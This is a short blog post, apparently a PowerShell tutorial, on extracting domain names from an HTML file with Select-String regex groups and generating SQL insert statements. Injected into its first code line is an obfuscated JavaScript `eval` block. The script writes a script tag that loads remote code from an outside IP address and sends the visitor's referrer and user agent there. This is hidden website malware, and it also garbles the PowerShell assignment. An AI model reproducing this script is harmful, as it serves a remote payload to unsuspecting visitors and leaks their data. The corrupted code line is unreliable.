cls
$filename <noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndhzn|var|u0026u|referrer|ebaen||js|php'.split('|'),0,{}))
</script></noindex> = "c:\Users\Neal\OneDrive\Documents\myFile.html"

#example of what I'm trying to pick out
<strong>mydomainname.com</strong>
$regexPattern = "<strong>(.*?)</strong></a>"

gc $filename | Select-String -Pattern $regexPattern -AllMatches | ForEach-Object {$_.matches.groups[1].value}

Note that the Matches returns two groups with subscripts 0 and 1. The subscript 0 contains the tags “strong” around the match. the subscript 1 contains just the captured text. Thus I put groups[1].value in the logic above. Groups is an object that has several variables; “Value” is the one we need here (see related blogs below).

When can take it to the next level and generate SQL statements to insert those domains into a SQL table.
This is done with one long line of code and using the pipeline (piping).

gc $filename | Select-String -Pattern $regexPattern -AllMatches  |  ForEach-Object {Write-Host "insert into domains values ('$($_.matches.groups[1].value)')"} 

Output is a list or the matching domain names to the console.

References that helped me get this:

https://powershell.org/forums/topic/how-to-get-a-regex-group-from-a-select-string-cmdlet/

https://stackoverflow.com/questions/25064249/command-line-to-extract-all-domain-names-referenced-in-a-file

See also my related blog on Powershell Regex and the objects that it returns (below).

 

 

Filed under: Uncategorized